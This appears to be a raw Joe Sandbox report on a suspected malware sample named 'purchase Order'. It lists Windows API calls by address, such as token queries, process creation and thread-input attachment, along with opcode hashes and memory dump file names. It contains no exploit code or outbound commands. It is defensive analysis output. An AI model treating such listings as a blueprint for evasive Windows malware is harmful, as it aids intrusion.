                                                        • Instruction ID: 6617b2b47ae2667704f30979cbee98de73e517e2c08ca1c300fb8f809b30150a
                                                        • Opcode Fuzzy Hash: d02ba181b20f371ce4bc4756a2c5829c149c95ff13eafe0f588b07b94ec31bf5
                                                        • Instruction Fuzzy Hash: 0611D03A200305AFDB25AF64DC05E7E77A8FF45318F90406AE80ACB2A0EB719945D7A5
                                                        APIs
                                                        • _free.LIBCMT ref: 00C72FB5
                                                          • Part of subcall function 00C6395C: __FF_MSGBANNER.LIBCMT ref: 00C63973
                                                          • Part of subcall function 00C6395C: __NMSG_WRITE.LIBCMT ref: 00C6397A
                                                          • Part of subcall function 00C6395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 4a9497a895644c127f537d9b9a2d97e9401ea848b8f30bc1da962c45147a1932
                                                        • Instruction ID: 77e467aa60a94a7c207045af2344d8c8a3e402f6826e889b14bb6c0246d8e84c
                                                        • Opcode Fuzzy Hash: 4a9497a895644c127f537d9b9a2d97e9401ea848b8f30bc1da962c45147a1932
                                                        • Instruction Fuzzy Hash: 3611CA32509251BBDB313FB4EC857693BA8AF04364F28C925F95DDA161DB35CA40BA90
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C805AC
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C805C7
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C805DD
                                                        • FreeLibrary.KERNEL32(?), ref: 00C80632
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                        • String ID:
                                                        • API String ID: 3137044355-0
                                                        • Opcode ID: 8cbbf937c00ad1a007e92455d6a079e07a9cddd9b1bb1fe382b0fb482364319a
                                                        • Instruction ID: c2ba4d84fbb81e5d28f6a3a9eed48635d2b8fe7ccda8e6ff83a89adfd39348dd
                                                        • Opcode Fuzzy Hash: 8cbbf937c00ad1a007e92455d6a079e07a9cddd9b1bb1fe382b0fb482364319a
                                                        • Instruction Fuzzy Hash: 37217571900619EFEB60AF91DC88BDBB7B8EF40708F10846DE91692050E770EA59DF58
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C86733
                                                        • _memset.LIBCMT ref: 00C86754
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C867A6
                                                        • CloseHandle.KERNEL32(00000000), ref: 00C867AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: 25c2a4f8e78d932e0dd7d56601c4769f5d0bc189f437881a324e40a4f4be92ff
                                                        • Instruction ID: da7bc60664b314584568047f54d99dce2da02cb42b2a1abc2c388178ae9df056
                                                        • Opcode Fuzzy Hash: 25c2a4f8e78d932e0dd7d56601c4769f5d0bc189f437881a324e40a4f4be92ff
                                                        • Instruction Fuzzy Hash: A411CA759012287AE73067A5AC4DFAFBABCEF44764F1041AAF505E71D0D2745F808BA8
                                                        APIs
                                                          • Part of subcall function 00C7AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C7AA79
                                                          • Part of subcall function 00C7AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C7AA83
                                                          • Part of subcall function 00C7AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C7AA92
                                                          • Part of subcall function 00C7AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C7AA99
                                                          • Part of subcall function 00C7AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7AAAF
                                                        • GetLengthSid.ADVAPI32(?,00000000,00C7ADE4,?,?), ref: 00C7B21B
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C7B227
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C7B22E
                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00C7B247
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                        • String ID:
                                                        • API String ID: 4217664535-0
                                                        • Opcode ID: 317ab929953003329fc04193f41a4f662db3192405d2b7f9e43bf569ef2cad83
                                                        • Instruction ID: 2cd352e8fc7c08be35c94a6c0cc2d2ec2414c1d1b8ff31071a9853930c3d7318
                                                        • Opcode Fuzzy Hash: 317ab929953003329fc04193f41a4f662db3192405d2b7f9e43bf569ef2cad83
                                                        • Instruction Fuzzy Hash: 4E11B871A01205AFCB049F98CD84FAEB7A9EF84318B14C06DE94A97212D731AE45DB20
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7B498
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4AA
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4C0
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C7B4DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: e48f354195cf45cc6caec448a43df810654af6b7813b33a357d3903093c7c5dd
                                                        • Instruction ID: 3b4c15c4660c69730b977d98de1f05a9dc299570a7880596a82d327701b93fee
                                                        • Opcode Fuzzy Hash: e48f354195cf45cc6caec448a43df810654af6b7813b33a357d3903093c7c5dd
                                                        • Instruction Fuzzy Hash: F5112A7A900218FFDB11DFA9C985F9DBBB8FB08710F208091E605B7295D771AE11DB94
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C5B5A5
                                                        • GetClientRect.USER32(?,?), ref: 00CBE69A
                                                        • GetCursorPos.USER32(?), ref: 00CBE6A4
                                                        • ScreenToClient.USER32(?,?), ref: 00CBE6AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 9ed77de485168ce39cd26151d47249ff2c8e170b3423c29c649db449317dfce6
                                                        • Instruction ID: f790593fc0e9e37ebfc81e15f5c63861a18ab7fa34fb33aa382a438b4a51d3b8
                                                        • Opcode Fuzzy Hash: 9ed77de485168ce39cd26151d47249ff2c8e170b3423c29c649db449317dfce6
                                                        • Instruction Fuzzy Hash: 3F11487990012ABFCB14DF94CC85EEE7BB8EB09306F500455F912E7140E730AE85DBA5
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00C87352
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00C87385
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C8739B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C873A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: a540e0e9b4e655be3fcd0accb9b94d6b548e87c06f867d57a5bbe604387d95b1
                                                        • Instruction ID: d89d36fd026ec6b5c1813f3764d1df61001a76c77111fd48a740359a9839b414
                                                        • Opcode Fuzzy Hash: a540e0e9b4e655be3fcd0accb9b94d6b548e87c06f867d57a5bbe604387d95b1
                                                        • Instruction Fuzzy Hash: C711E172A08204BFC701ABA9DC45F9E7BAD9B45324F144325F829D32A1E770CE0097B9
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction ID: b3b1abdb8362f2deb2d9bbc91709dcce8b8916d3a78747cd4e6b105d87b6e3c1
                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction Fuzzy Hash: 0D01493240014EBBCF1A5E98DC018EE7F23BB183A0B588455FE2C59031D336CAB2BB81
                                                        APIs
                                                          • Part of subcall function 00C67A0D: __getptd_noexit.LIBCMT ref: 00C67A0E
                                                        • __lock.LIBCMT ref: 00C6748F
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00C674AC
                                                        • _free.LIBCMT ref: 00C674BF
                                                        • InterlockedIncrement.KERNEL32(015D4CC0), ref: 00C674D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 2704283638-0
                                                        • Opcode ID: 7bbd9669136336b52f0496f23019ac78f91b1411fffbe684e687661df20083a1
                                                        • Instruction ID: 387b774cad7373a7abfeada929e75cecb43f70dd84b08c171298ec7659473709
                                                        • Opcode Fuzzy Hash: 7bbd9669136336b52f0496f23019ac78f91b1411fffbe684e687661df20083a1
                                                        • Instruction Fuzzy Hash: E001F972905611ABC731AF64958D77DBB70BF04718F184605F82863690CF349A41DFC7
                                                        APIs
                                                        • __lock.LIBCMT ref: 00C67AD8
                                                          • Part of subcall function 00C67CF4: __mtinitlocknum.LIBCMT ref: 00C67D06
                                                          • Part of subcall function 00C67CF4: EnterCriticalSection.KERNEL32(00000000,?,00C67ADD,0000000D), ref: 00C67D1F
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00C67AE5
                                                        • __lock.LIBCMT ref: 00C67AF9
                                                        • ___addlocaleref.LIBCMT ref: 00C67B17
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1687444384-0
                                                        • Opcode ID: 0d807e12fccdb784da9f38b73ba6fb91ffe2b41d1cac8de0216c4f9212757a9e
                                                        • Instruction ID: 66853734766bb1d19f28c96525ef90d892abed1c798d2b7618bf62056109a06b
                                                        • Opcode Fuzzy Hash: 0d807e12fccdb784da9f38b73ba6fb91ffe2b41d1cac8de0216c4f9212757a9e
                                                        • Instruction Fuzzy Hash: 83016DB1404B00EFD730DF75C94574AB7F0AF44329F208D0EE59A976A0CB74A680DB45
                                                        APIs
                                                        • _memset.LIBCMT ref: 00CAE33D
                                                        • _memset.LIBCMT ref: 00CAE34C
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D03D00,00D03D44), ref: 00CAE37B
                                                        • CloseHandle.KERNEL32 ref: 00CAE38D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        • Opcode ID: be499561845e346a2d78f53b3f2dfacf44726380f92211c5ceabffaf3b40e762
                                                        • Instruction ID: 2437060a86ef1d119e77dcd575d1366b35bf8b0df7549e5464a7f399f393af4b
                                                        • Opcode Fuzzy Hash: be499561845e346a2d78f53b3f2dfacf44726380f92211c5ceabffaf3b40e762
                                                        • Instruction Fuzzy Hash: 10F058F1640314BBE2106B61AC46FBB7E6CDB04B98F004421FE0DEA2A2D3759E0096B8
                                                        APIs
                                                          • Part of subcall function 00C5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
                                                          • Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5AFF2
                                                          • Part of subcall function 00C5AF83: BeginPath.GDI32(?), ref: 00C5B009
                                                          • Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5B033
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CAEA8E
                                                        • LineTo.GDI32(00000000,?,?), ref: 00CAEA9B
                                                        • EndPath.GDI32(00000000), ref: 00CAEAAB
                                                        • StrokePath.GDI32(00000000), ref: 00CAEAB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: ea5a1bbe2c307787f5a5f546ad52945d6bc3038f956fd39e813c81599ab422d0
                                                        • Instruction ID: a5b0d9ac0a6e59fc8749001dd76628382f1b1eed03a70ac426ff2d188a415efe
                                                        • Opcode Fuzzy Hash: ea5a1bbe2c307787f5a5f546ad52945d6bc3038f956fd39e813c81599ab422d0
                                                        • Instruction Fuzzy Hash: A2F0823200525ABBDB12AF98ED0DFCE3F59AF06311F084201FE12611E1C7755A51DBE9
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C7C84A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7C85D
                                                        • GetCurrentThreadId.KERNEL32 ref: 00C7C864
                                                        • AttachThreadInput.USER32(00000000), ref: 00C7C86B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 9407db954fd468f34bfc557d104ac9ea9ef7414f0c58f0beb7968577237b18a0
                                                        • Instruction ID: 0655c888a63605b2232e5e247ce8aa9d115f4f898cf42c34c6d04080bef44fbc
                                                        • Opcode Fuzzy Hash: 9407db954fd468f34bfc557d104ac9ea9ef7414f0c58f0beb7968577237b18a0
                                                        • Instruction Fuzzy Hash: 48E06D71141228BADB205BA2EC4DFDF7F1CEF067A1F008429F60E844A0C6B1C580CBE0
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00C7B0D6
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C7AC9D), ref: 00C7B0DD
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C7AC9D), ref: 00C7B0EA
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C7AC9D), ref: 00C7B0F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 2a319e3a5a6d7bbf8ac146791dc288966c1bade9b9e6091ad011960d1c1bbd72
                                                        • Instruction ID: 195a7761cab14d521d1727958e696f47ca5782a9340884e782d07ca5de1fa34a
                                                        • Opcode Fuzzy Hash: 2a319e3a5a6d7bbf8ac146791dc288966c1bade9b9e6091ad011960d1c1bbd72
                                                        • Instruction Fuzzy Hash: E4E04F726012119BD7201FB5DD0CF4F3BA8AF55792F018828E246D6050DA2484028761
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00C5B496
                                                        • SetTextColor.GDI32(?,000000FF), ref: 00C5B4A0
                                                        • SetBkMode.GDI32(?,00000001), ref: 00C5B4B5
                                                        • GetStockObject.GDI32(00000005), ref: 00C5B4BD
                                                        • GetWindowDC.USER32(?,00000000), ref: 00CBDE2B
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CBDE38
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00CBDE51
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00CBDE6A
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00CBDE8A
                                                        • ReleaseDC.USER32(?,00000000), ref: 00CBDE95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: e4fc340405ff20fc5d5b58bb5e6fc5d023ce54d164534d4364a54a2a1ec39299
                                                        • Instruction ID: 8927926de4d6fe68e04b86d42ea5379329d646fd87d9166d0ffa05c3b333e36d
                                                        • Opcode Fuzzy Hash: e4fc340405ff20fc5d5b58bb5e6fc5d023ce54d164534d4364a54a2a1ec39299
                                                        • Instruction Fuzzy Hash: 9DE0C931100240AADB215B64EC09BDD7B11AB52336F14C666FABB980E197718A859B11
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C7B2DF
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00C7B2EB
                                                        • CloseHandle.KERNEL32(?), ref: 00C7B2F4
                                                        • CloseHandle.KERNEL32(?), ref: 00C7B2FC
                                                          • Part of subcall function 00C7AB24: GetProcessHeap.KERNEL32(00000000,?,00C7A848), ref: 00C7AB2B
                                                          • Part of subcall function 00C7AB24: HeapFree.KERNEL32(00000000), ref: 00C7AB32
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
